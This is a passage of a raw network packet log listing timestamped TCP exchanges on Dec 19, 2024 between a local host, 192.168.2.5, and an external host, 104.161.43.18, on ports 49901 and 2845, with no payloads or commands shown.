                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.044796944 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.045835018 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.045955896 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.046013117 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.046942949 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.047024012 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.047097921 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.047998905 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.048115015 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.048177004 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.049119949 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.049235106 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.049287081 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.050307035 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.050492048 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.050533056 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.051376104 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.051492929 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.052495956 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.052562952 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.052654028 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.053600073 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.053653002 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.053702116 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.054795027 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.054837942 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.054985046 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.055469036 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.055851936 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.056124926 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.056231022 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.056997061 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.057168961 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.058206081 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.058275938 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.058311939 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.059178114 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.059222937 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.059360027 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.059407949 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.060436010 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.112552881 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.194297075 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.194385052 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.194878101 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.194941044 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.195046902 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.196014881 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.196131945 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.196135044 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.196212053 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.197122097 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.197220087 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.198374987 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.198432922 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.198450089 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.198774099 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.199378967 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.199579000 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.199644089 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.200608015 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.200689077 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.200738907 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.201761007 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.201941967 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.202622890 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.202755928 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.202945948 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.203054905 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.203855991 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.203923941 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.204035997 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.204922915 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.205018044 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.205075979 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.206130981 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.206204891 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.206270933 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.207326889 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.207459927 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.208405972 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.208512068 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.208534002 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.209450960 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.209513903 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.209697962 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.210069895 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.210603952 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.210655928 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.210830927 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.211632967 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.211740971 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.212739944 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.212970972 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.212975979 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.213917971 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.213967085 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.214085102 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.214138031 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.215051889 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.215069056 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.216190100 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.216335058 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.216464043 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.217308998 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.217355967 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.217482090 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.217482090 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.218569994 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.218626976 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.218957901 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.219465017 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.219594002 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.219860077 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.220597982 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.220732927 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.220956087 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.221749067 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.221832991 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.221896887 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.222796917 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.222901106 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.223246098 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.223917007 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.224019051 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.224143982 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.225116014 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.225188017 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.226161957 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.226242065 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.226274967 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.227269888 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.227294922 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.227384090 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.227503061 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.228391886 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.228506088 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.229542017 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.229688883 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.229754925 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.230664015 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.230802059 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.231319904 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.231761932 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.231831074 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.231962919 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.232881069 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.232990026 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.233131886 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.234029055 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.234118938 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.235157013 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.235179901 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.235187054 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.235268116 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.236228943 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.236345053 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.236716032 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.237394094 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.237576008 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.237694979 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.238521099 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.238655090 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.239653111 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.239710093 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.239875078 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.240998983 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.241058111 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.241167068 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.241239071 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.242019892 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.242141962 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.242681980 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.242975950 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.243047953 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.243107080 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.244191885 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.244299889 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.244380951 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.245178938 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.245266914 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.245349884 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.246376038 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.246525049 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.247607946 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.247641087 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.247787952 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.247910023 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.249082088 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.249324083 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.249442101 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.250233889 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.250303984 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.250446081 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.251271963 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.251452923 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.251511097 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.252681971 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.252839088 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.252907991 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.253647089 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.296099901 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.387172937 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.387295008 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.387376070 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.387717962 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.387734890 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.387866974 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.388673067 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.388726950 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.388798952 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.389822960 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.389919043 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.391026020 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.391040087 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.391349077 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.391818047 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.392220020 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.392400980 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.392961025 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.393747091 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.393898964 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.394500971 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.394685030 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.394742966 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.394845963 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.395268917 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.395358086 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.395554066 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.396320105 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.396480083 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.396534920 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.397453070 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.397542953 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.398535967 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.398588896 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.398642063 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.399270058 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.399636984 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.399753094 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.400115967 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.400831938 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.400902033 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.401052952 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.401892900 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.402084112 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.402158022 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.403028011 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.403127909 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.403717041 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.404222012 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.404293060 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.404375076 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.405250072 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.405318975 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.405431986 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.406373978 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.406486034 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.406585932 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.407529116 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.407736063 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.407900095 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:11.408685923 CET284549901104.161.43.18192.168.2.5
